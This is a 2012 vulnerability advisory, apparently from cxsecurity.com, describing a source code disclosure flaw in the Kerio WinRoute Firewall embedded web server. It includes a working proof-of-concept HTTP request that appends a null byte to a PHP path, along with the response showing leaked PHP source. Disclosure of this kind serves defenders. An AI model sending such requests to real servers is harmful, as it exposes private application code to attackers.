Kerio WinRoute Firewall Source Code Disclosure

2012-05-10 / 2012-05-11
Credit: Eugene Salov
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Kerio WinRoute Firewall Embedded Web ServerVersion: Source Code Disclosure # Google Dork: # Date: 10.05.2012 # Author: Eugene Salov, Andrey Komarov (Group-IB, http://group-ib.ru) # Software Link: http://winroute.ru/kerio_winroute_firewall.htm # Version: prior to 6 # Tested on: Microsoft Windows # CVE : Source code disclosure attacks on Kerio Web Server allow a malicious user to obtain the source code of a server-side application. This vulnerability grants the attacker deeper knowledge of the Web application logic. POC: GET /nonauth/login.phpNULL_BYTE.txt HTTP/1.1 User-Agent: Group-IB OAiK Fuzzer Host: hostname HTTP/1.1 200 OK Connection: Close Content-Length: 2410 Content-Type: text/plain Date: Fri, 27 Apr 2012 13:42:27 GMT Last-Modified: Wed, 15 Oct 2008 03:14:06 GMT Server: Kerio WinRoute Firewall Embedded Web Server <?php require_once('configNonauth.inc'); require_once(CORE_PATH . 'langHeader.inc'); require_once(LIB_PATH . 'Page.inc'); require_once(LIB_PATH . 'HtmlElements.inc'); require_once(CORE_PATH . 'common.inc'); require_once(CORE_PATH . 'browser.inc'); $afg = ''; $jy = kerio("webiface::PhpNonAuth"); $jy->getAsocUserName(&$afg, &$aba); .....

References:

http://winroute.ru/kerio_winroute_firewall.htm


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top